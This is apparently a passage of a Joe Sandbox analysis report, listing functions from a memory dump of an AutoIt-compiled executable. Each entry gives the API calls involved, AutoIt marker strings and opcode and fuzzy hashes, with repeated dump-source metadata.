                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: Error:
                                                                                                                                                                                                                • API String ID: 4104443479-232661952
                                                                                                                                                                                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                                                                                                                Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                                                                                                                • String ID: X$pWH
                                                                                                                                                                                                                • API String ID: 85490731-941433119
                                                                                                                                                                                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                                                                                                                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1794320848-0
                                                                                                                                                                                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                                                                                                Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2429186680-0
                                                                                                                                                                                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                                                                                Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                                                                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 680241177-0
                                                                                                                                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                                                                                Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                • _free.LIBCMT ref: 004295A0
                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                                                                • API String ID: 3938964917-2806939583
                                                                                                                                                                                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                                                                                Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                                                                • API String ID: 1765576173-2684727018
                                                                                                                                                                                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                                                                                Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                                                                                                                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4163294574-0
                                                                                                                                                                                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                                                                                                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3199840319-0
                                                                                                                                                                                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
